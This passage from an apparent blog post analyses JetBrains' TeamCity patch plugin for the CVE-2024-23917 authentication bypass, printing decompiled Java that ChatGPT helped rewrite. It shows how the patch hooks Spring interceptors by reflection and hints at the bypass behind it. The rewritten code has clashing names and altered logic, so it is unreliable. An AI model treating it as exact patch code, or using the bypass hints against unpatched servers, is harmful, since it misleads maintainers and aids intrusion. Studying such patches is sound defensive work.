class="o">(</span><span class="n">eventDispatcher</span><span class="o">,</span> <span class="n">serviceLocator</span><span class="o">).</span><span class="na">cfr_renamed_0</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="o">}</span> <span class="k">if</span> <span class="o">(</span><span class="n">bl</span><span class="o">)</span> <span class="o">{</span> <span class="kt">int</span> <span class="n">n3</span> <span class="o">=</span> <span class="n">cfr_renamed_0</span><span class="o">;</span> <span class="n">cfr_renamed_0</span> <span class="o">=</span> <span class="o">++</span><span class="n">n3</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span></code></pre></figure> <p>This is a much more readable code but still could be cleaned up a bit. After using ChatGPT (+some manual changes) to rewrite the code to make it even more readable, the code looks like the following:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="kn">package</span> <span class="nn">0.0.0</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.ServiceLocator</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.log.Loggers</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.serverSide.BuildServerListener</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.util.EventDispatcher</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.version.ServerVersionHolder</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.web.openapi.PluginDescriptor</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">org.jetbrains.annotations.NotNull</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityPluginInitializer</span> <span class="o">{</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">int</span> <span class="n">counter</span> <span class="o">=</span> <span class="mi">0</span><span class="o">;</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="n">isEnabled</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span> <span class="kd">public</span> <span class="nf">SecurityPluginInitializer</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">ServiceLocator</span> <span class="n">serviceLocator</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">PluginDescriptor</span> <span class="n">pluginDescriptor</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">EventDispatcher</span><span class="o">&lt;</span><span class="nc">BuildServerListener</span><span class="o">&gt;</span> <span class="n">eventDispatcher</span><span class="o">)</span> <span class="o">{</span> <span class="k">if</span> <span class="o">(</span><span class="n">isEnabled</span><span class="o">)</span> <span class="o">{</span> <span class="kt">int</span> <span class="n">buildNumber</span> <span class="o">=</span> <span class="nc">Integer</span><span class="o">.</span><span class="na">parseInt</span><span class="o">(</span><span class="nc">ServerVersionHolder</span><span class="o">.</span><span class="na">getVersion</span><span class="o">().</span><span class="na">getBuildNumber</span><span class="o">());</span> <span class="kt">int</span> <span class="n">maxAffectedBuildNumber</span> <span class="o">=</span> <span class="nc">TeamCityProperties</span><span class="o">.</span><span class="na">getInteger</span><span class="o">(</span><span class="s">"teamcity.CVE-2024-23917.patch.maxAffectedBuildNumber"</span><span class="o">,</span> <span class="mi">147486</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">buildNumber</span> <span class="o">&gt;</span> <span class="n">maxAffectedBuildNumber</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">warn</span><span class="o">(</span><span class="s">"The plugin "</span> <span class="o">+</span> <span class="n">pluginDescriptor</span><span class="o">.</span><span class="na">getPluginName</span><span class="o">()</span> <span class="o">+</span> <span class="s">" is no longer required for this TeamCity version"</span><span class="o">);</span> <span class="k">return</span><span class="o">;</span> <span class="o">}</span> <span class="k">new</span> <span class="nf">SecurityInterceptor</span><span class="o">(</span><span class="n">eventDispatcher</span><span class="o">,</span> <span class="n">serviceLocator</span><span class="o">).</span><span class="na">initializeSecurity</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="n">counter</span><span class="o">++;</span> <span class="o">}</span> <span class="o">}</span> <span class="o">}</span></code></pre></figure> <p>The code reads the <code class="language-plaintext highlighter-rouge">currentBuildNumber</code> and if the current build number is less than the maximum affected build number (<code class="language-plaintext highlighter-rouge">147486</code>), then the installation is proceeded ahead, else skipped. For proceeding ahead, it triggers the code <code class="language-plaintext highlighter-rouge">new SecurityInterceptor(eventDispatcher, serviceLocator).initializeSecurity(true);</code> which is coming from our extracted <code class="language-plaintext highlighter-rouge">0.java</code> file.</p> <p>Now, let’s look at the <code class="language-plaintext highlighter-rouge">2.java</code> file first:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="kn">package</span> <span class="nn">com.example.buildserver</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.List</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">com.example.security.SecurityHandler</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.log.Loggers</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.serverSide.BuildServerAdapter</span><span class="o">;</span> <span class="kd">class</span> <span class="nc">SecurityPatch</span> <span class="kd">extends</span> <span class="nc">BuildServerAdapter</span> <span class="o">{</span> <span class="kd">private</span> <span class="kd">final</span> <span class="kt">boolean</span> <span class="n">isSecurityPatchEnabled</span><span class="o">;</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">SecurityHandler</span> <span class="n">securityHandler</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="n">isDebugModeEnabled</span><span class="o">;</span> <span class="nc">SecurityPatch</span><span class="o">(</span><span class="nc">SecurityHandler</span> <span class="n">handler</span><span class="o">,</span> <span class="kt">boolean</span> <span class="n">isEnabled</span><span class="o">)</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">securityHandler</span> <span class="o">=</span> <span class="n">handler</span><span class="o">;</span> <span class="k">this</span><span class="o">.</span><span class="na">isSecurityPatchEnabled</span> <span class="o">=</span> <span class="n">isEnabled</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@Override</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">serverStartup</span><span class="o">()</span> <span class="o">{</span> <span class="kt">boolean</span> <span class="n">isDebug</span> <span class="o">=</span> <span class="n">isDebugModeEnabled</span><span class="o">;</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">urlMappingClass</span> <span class="o">=</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"jetbrains.spring.web.UrlMapping"</span><span class="o">);</span> <span class="nc">Object</span> <span class="n">urlMappingService</span> <span class="o">=</span> <span class="n">securityHandler</span><span class="o">.</span><span class="na">findSingletonService</span><span class="o">(</span><span class="n">urlMappingClass</span><span class="o">);</span> <span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">authInterceptorClass</span> <span class="o">=</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.interceptors.AuthorizationInterceptorImpl"</span><span class="o">);</span> <span class="nc">Object</span> <span class="n">authInterceptorService</span> <span class="o">=</span> <span class="n">securityHandler</span><span class="o">.</span><span class="na">findSingletonService</span><span class="o">(</span><span class="n">authInterceptorClass</span><span class="o">);</span> <span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">superClass</span> <span class="o">=</span> <span class="n">urlMappingClass</span><span class="o">.</span><span class="na">getSuperclass</span><span class="o">();</span> <span class="nc">Field</span> <span class="n">adaptedInterceptorsField</span> <span class="o">=</span> <span class="n">findField</span><span class="o">(</span><span class="n">superClass</span><span class="o">,</span> <span class="s">"adaptedInterceptors"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">adaptedInterceptorsField</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nf">IllegalStateException</span><span class="o">(</span><span class="s">"Required field 'adaptedInterceptors' not found in "</span> <span class="o">+</span> <span class="n">urlMappingClass</span><span class="o">.</span><span class="na">getName</span><span class="o">());</span> <span class="o">}</span> <span class="n">adaptedInterceptorsField</span><span class="o">.</span><span class="na">setAccessible</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">Object</span><span class="o">&gt;</span> <span class="n">adaptedInterceptors</span> <span class="o">=</span> <span class="o">(</span><span class="nc">List</span><span class="o">&lt;</span><span class="nc">Object</span><span class="o">&gt;)</span> <span class="n">adaptedInterceptorsField</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="n">urlMappingService</span><span class="o">);</span> <span class="n">adaptedInterceptors</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="n">securityHandler</span><span class="o">.</span><span class="na">createProxy</span><span class="o">(</span><span class="n">authInterceptorService</span><span class="o">));</span> <span class="k">if</span> <span class="o">(</span><span class="n">isSecurityPatchEnabled</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">warn</span><span class="o">(</span><span class="s">"Security patch for CVE-2024-23917 has been activated"</span><span class="o">);</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">debug</span><span class="o">(</span><span class="s">"Security patch for CVE-2024-23917 has been activated"</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Throwable</span> <span class="n">ex</span><span class="o">)</span> <span class="o">{</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">warn</span><span class="o">(</span><span class="s">"Could not activate security patch for CVE-2024-23917. Error: "</span> <span class="o">+</span> <span class="n">ex</span><span class="o">.</span><span class="na">toString</span><span class="o">());</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">debug</span><span class="o">(</span><span class="s">"Error activating security patch for CVE-2024-23917: "</span> <span class="o">+</span> <span class="n">ex</span><span class="o">.</span><span class="na">toString</span><span class="o">(),</span> <span class="n">ex</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">private</span> <span class="nc">Field</span> <span class="nf">findField</span><span class="o">(</span><span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">clazz</span><span class="o">,</span> <span class="nc">String</span> <span class="n">fieldName</span><span class="o">)</span> <span class="o">{</span> <span class="k">while</span> <span class="o">(</span><span class="n">clazz</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Field</span> <span class="n">field</span> <span class="o">=</span> <span class="n">clazz</span><span class="o">.</span><span class="na">getDeclaredField</span><span class="o">(</span><span class="n">fieldName</span><span class="o">);</span> <span class="k">return</span> <span class="n">field</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">NoSuchFieldException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="n">clazz</span> <span class="o">=</span> <span class="n">clazz</span><span class="o">.</span><span class="na">getSuperclass</span><span class="o">();</span> <span class="o">}</span> <span class="o">}</span> <span class="k">return</span> <span class="kc">null</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span></code></pre></figure> <ol> <li> <p>The code starts with accessing <code class="language-plaintext highlighter-rouge">UrlMapping</code> class from within <code class="language-plaintext highlighter-rouge">jetbrains.spring.web.UrlMapping</code> and then further trying to access it’s superClass. Searching through the codebase, we can see the superClass for <code class="language-plaintext highlighter-rouge">UrlMapping</code> is <code class="language-plaintext highlighter-rouge">TeamCitySimpleUrlHandlerMapping</code>.</p> </li> <li> <p>The superClass for <code class="language-plaintext highlighter-rouge">TeamCitySimpleUrlHandlerMapping</code> is <code class="language-plaintext highlighter-rouge">AbstractHandlerMapping</code>. The code then further tries to fetch the <code class="language-plaintext highlighter-rouge">adaptedInterceptors</code> field from the superClass which in our case is the <code class="language-plaintext highlighter-rouge">TeamCitySimpleUrlHandlerMapping</code>.</p> </li> <li> <p>Looking through the codebase, we won’t see a field named <code class="language-plaintext highlighter-rouge">adaptedInterceptors</code> defined within <code class="language-plaintext highlighter-rouge">TeamCitySimpleUrlHandlerMapping</code> but somehow the patch is trying to fetch it. Going through the <code class="language-plaintext highlighter-rouge">findField</code> function, we can see that <code class="language-plaintext highlighter-rouge">findField</code> attempts to find a field on the supplied class and if not found, it searches through it’s superclasses as well. So essentially we are fetching <code class="language-plaintext highlighter-rouge">adaptedInterceptors</code> from <code class="language-plaintext highlighter-rouge">UrlMapping</code> -&gt; <code class="language-plaintext highlighter-rouge">TeamCitySimpleUrlHandlerMapping</code> -&gt; <code class="language-plaintext highlighter-rouge">AbstractHandlerMapping</code> !</p> </li> <li> <p>In Spring MVC, the collection of <code class="language-plaintext highlighter-rouge">adaptedInterceptors</code> is generally accessed or modified through reflection, as shown in the above code snippet. This approach allows for dynamic changes to the request processing pipeline without modifying core configurations or restarting the server. This can be useful for applying security patches, introducing custom interceptors, or integrating third-party interceptors at runtime.</p> </li> <li> <p>Finally they are adding a <code class="language-plaintext highlighter-rouge">new Interceptor</code> into the list of <code class="language-plaintext highlighter-rouge">adaptedInterceptors</code>, this means that most like this newly added Interceptor will ensure the authentication bypass vulnerability is prevented.</p> </li> </ol> <p>Now let’s finally look at the final file where all the logic for custom new interceptor is written:</p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.lang.reflect.Field</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.lang.reflect.Method</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.lang.reflect.Proxy</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.EventListener</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">java.util.HashSet</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.servlet.http.HttpServletRequest</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">javax.servlet.http.HttpServletResponse</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.log.Loggers</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.serverSide.TeamCityProperties</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.util.EventDispatcher</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">jetbrains.buildServer.web.util.WebUtil</span><span class="o">;</span> <span class="kn">import</span> <span class="nn">org.jetbrains.annotations.NotNull</span><span class="o">;</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityInterceptor</span> <span class="o">{</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">EventDispatcher</span><span class="o">&lt;</span><span class="nc">BuildServerListener</span><span class="o">&gt;</span> <span class="n">eventDispatcher</span><span class="o">;</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">ServiceLocator</span> <span class="n">serviceLocator</span><span class="o">;</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="n">securityPatchActivated</span><span class="o">;</span> <span class="kd">public</span> <span class="nf">SecurityInterceptor</span><span class="o">(</span><span class="nd">@NotNull</span> <span class="nc">EventDispatcher</span><span class="o">&lt;</span><span class="nc">BuildServerListener</span><span class="o">&gt;</span> <span class="n">eventDispatcher</span><span class="o">,</span> <span class="nd">@NotNull</span> <span class="nc">ServiceLocator</span> <span class="n">serviceLocator</span><span class="o">)</span> <span class="o">{</span> <span class="kt">boolean</span> <span class="n">previousActivation</span> <span class="o">=</span> <span class="n">securityPatchActivated</span><span class="o">;</span> <span class="k">this</span><span class="o">.</span><span class="na">eventDispatcher</span> <span class="o">=</span> <span class="n">eventDispatcher</span><span class="o">;</span> <span class="k">this</span><span class="o">.</span><span class="na">serviceLocator</span> <span class="o">=</span> <span class="n">serviceLocator</span><span class="o">;</span> <span class="k">if</span> <span class="o">(</span><span class="n">securityPatchActivated</span><span class="o">)</span> <span class="o">{</span> <span class="n">securityPatchActivated</span> <span class="o">=</span> <span class="o">!</span><span class="n">previousActivation</span><span class="o">;</span> <span class="o">}</span> <span class="o">}</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">activateSecurityPatch</span><span class="o">(</span><span class="kt">boolean</span> <span class="n">activated</span><span class="o">)</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">eventDispatcher</span><span class="o">.</span><span class="na">addListener</span><span class="o">((</span><span class="nc">EventListener</span><span class="o">)((</span><span class="nc">Object</span><span class="o">)</span><span class="k">new</span> <span class="nc">SecurityPatchActivator</span><span class="o">(</span><span class="k">this</span><span class="o">,</span> <span class="n">activated</span><span class="o">)));</span> <span class="o">}</span> <span class="kd">private</span> <span class="nc">Object</span> <span class="nf">createHandlerInterceptorProxy</span><span class="o">(</span><span class="nc">Object</span> <span class="n">handler</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">ClassNotFoundException</span> <span class="o">{</span> <span class="nc">Class</span><span class="o">&lt;?&gt;</span> <span class="n">clazz</span> <span class="o">=</span> <span class="nc">Class</span><span class="o">.</span><span class="na">forName</span><span class="o">(</span><span class="s">"org.springframework.web.servlet.HandlerInterceptor"</span><span class="o">);</span> <span class="c1">// handler here is AuthorizationInterceptorImpl</span> <span class="k">return</span> <span class="nc">Proxy</span><span class="o">.</span><span class="na">newProxyInstance</span><span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getClassLoader</span><span class="o">(),</span> <span class="k">new</span> <span class="nc">Class</span><span class="o">[]{</span><span class="n">clazz</span><span class="o">},</span> <span class="o">(</span><span class="nc">Object</span> <span class="n">proxyObj</span><span class="o">,</span> <span class="nc">Method</span> <span class="n">method</span><span class="o">,</span> <span class="nc">Object</span><span class="o">[]</span> <span class="n">methodArgs</span><span class="o">)</span> <span class="o">-&gt;</span> <span class="k">this</span><span class="o">.</span><span class="na">intercept_wrap</span><span class="o">(</span><span class="n">handler</span><span class="o">,</span><span class="n">proxyObj</span><span class="o">,</span> <span class="n">method</span><span class="o">,</span> <span class="n">methodArgs</span><span class="o">));</span> <span class="o">}</span> <span class="kd">private</span> <span class="kt">boolean</span> <span class="nf">intercept</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">Object</span> <span class="n">handlerInterceptor</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// this is called from AuthorizationInterceptorImpl.prehandle func is called</span> <span class="c1">// handlerInterceptor is AuthorizationInterceptorImpl</span> <span class="c1">// handler is controller being called</span> <span class="cm">/** * if (!interceptor.preHandle(request, response, this.handler)) { this.triggerAfterCompletion(request, response, (Exception)null); return false; } this is where its called interceptor.prehandle will call this - intercept fnc where */</span> <span class="kt">boolean</span> <span class="n">isSecurityPatchEnabled</span> <span class="o">=</span> <span class="nc">TeamCityProperties</span><span class="o">.</span><span class="na">getBooleanOrTrue</span><span class="o">(</span><span class="s">"teamcity.CVE-2024-23917.patch.enabled"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">isSecurityPatchEnabled</span> <span class="o">==</span> <span class="kc">false</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="nc">Object</span> <span class="n">includeRequestUri</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"javax.servlet.include.request_uri"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">includeRequestUri</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">||</span> <span class="n">request</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"javax.servlet.forward.request_uri"</span><span class="o">)</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="o">}</span> <span class="nc">String</span> <span class="n">path</span> <span class="o">=</span> <span class="nc">WebUtil</span><span class="o">.</span><span class="na">getPathWithoutContext</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="c1">// removes ;&lt;--anything after--&gt;</span> <span class="kt">boolean</span> <span class="n">isAgentEndpoint</span> <span class="o">=</span> <span class="n">path</span><span class="o">.</span><span class="na">startsWith</span><span class="o">(</span><span class="s">"/app/agents/"</span><span class="o">)</span> <span class="o">||</span> <span class="n">path</span><span class="o">.</span><span class="na">startsWith</span><span class="o">(</span><span class="s">"/update/"</span><span class="o">);</span> <span class="k">if</span> <span class="o">(</span><span class="n">isAgentEndpoint</span><span class="o">)</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="c1">// donot run this patch</span> <span class="o">}</span> <span class="nc">HashSet</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="n">securedEndpoints</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">HashSet</span><span class="o">&lt;&gt;();</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.login.LoginController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.login.LoginSubmitController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.login.LoginIconsController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.user.RegisterUserController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.user.SubmitRegisterUserController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.admin.users.SetupAdminController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.admin.users.SubmitSetupAdminController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.admin.users.SubmitCreateAdminController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.status.ExternalStatusController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.license.ShowAgreementController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.web.RuntimeErrorController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.web.RuntimeErrorTestController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.agentServer.AgentPollingProtocolController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.agentServer.AgentProtocolsController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.XmlRpcController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.web.plugins.agent.BuildAgentUpdateInfoControllerNew"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.serverSide.oauth.space.SpaceEndpointController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.resetPassword.ForgotPasswordController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.resetPassword.ResetPasswordController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.BadRequestController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.PageNotFoundController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.agent.AgentParametersController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.agent.UploadOnServerController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.proxyHealthCheck.PreferredNodeHealthStatusController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.win32.web.LoginCheckController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.win32.web.LoginController"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.buildServer.controllers.PageResourceCompressorImpl"</span><span class="o">);</span> <span class="n">securedEndpoints</span><span class="o">.</span><span class="na">add</span><span class="o">(</span><span class="s">"jetbrains.spring.web.JspController"</span><span class="o">);</span> <span class="c1">//issue</span> <span class="c1">// here they are checking, instead of (.jsp + jsp_precompile) to know which request to skip, we have list of all controllers to skip</span> <span class="c1">// , check if these request belong to these class's, if yes, we can let them go, else in anyother case, check auth</span> <span class="k">if</span> <span class="o">(</span><span class="n">securedEndpoints</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="n">handler</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getName</span><span class="o">()))</span> <span class="o">{</span> <span class="k">return</span> <span class="kc">true</span><span class="o">;</span> <span class="c1">// donot run the patch</span> <span class="o">}</span> <span class="nc">Boolean</span> <span class="n">isAuthenticationRequired</span> <span class="o">=</span> <span class="n">checkAuthenticationRequirement</span><span class="o">(</span><span class="n">handlerInterceptor</span><span class="o">,</span> <span class="n">path</span><span class="o">);</span> <span class="c1">// calls the real fn to check auth is needed fnc's </span> <span class="k">if</span> <span class="o">(</span><span class="nc">Boolean</span><span class="o">.</span><span class="na">FALSE</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">isAuthenticationRequired</span><span class="o">))</span> <span class="o">{</span> <span class="n">response</span><span class="o">.</span><span class="na">setStatus</span><span class="o">(</span><span class="mi">403</span><span class="o">);</span> <span class="k">try</span> <span class="o">{</span> <span class="n">response</span><span class="o">.</span><span class="na">getWriter</span><span class="o">().</span><span class="na">write</span><span class="o">(</span><span class="s">"Access denied"</span><span class="o">);</span> <span class="nc">Loggers</span><span class="o">.</span><span class="na">SERVER</span><span class="o">.</span><span class="na">warn</span><span class="o">(</span><span class="s">"Replying with 403 status for the unauthorized request: "</span> <span class="o">+</span> <span class="nc">WebUtil</span><span class="o">.</span><span class="na">getRequestDump</span><span class="o">(</span><span class="n">request</span><span class="o">));</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">IOException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// Log the exception if necessary</span> <span class="o">}</span> <span class="o">}</span> <span class="k">return</span> <span class="kc">false</span><span class="o">;</span> <span class="o">}</span> <span class="kd">private</span> <span class="kd">static</span> <span class="kt">boolean</span> <span class="nf">checkAuthenticationRequirement</span><span class="o">(</span><span class="nc">Object</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">String</span> <span class="n">path</span><span class="o">)</span> <span class="o">{</span> <span class="cm">/** * in short this is whats happening * AuthorizationInterceptorImpl.myAuthorizationPaths.isAuthenticationRequired(path) * */</span> <span class="nc">Object</span> <span class="n">authorizationPaths</span><span class="o">;</span> <span class="k">try</span> <span class="o">{</span> <span class="nc">Field</span> <span class="n">authorizationPathsField</span> <span class="o">=</span> <span class="n">handler</span><span class="o">.</span><span class="na">getClass</span><span class="o">().</span><span class="na">getDeclaredField</span><span class="o">(</span><span class="s">"myAuthorizationPaths"</span><span class="o">);</span> <span class="n">authorizationPathsField</span><span class="o">.</span><span class="na">setAccessible</span><span class="o">(</span><span class="kc">true</span><span class="o">);</span> <span class="n">authorizationPaths</span> <span class="o">=</span> <span class="n">authorizationPathsField</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="n">handler</span><span class="o">);</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span 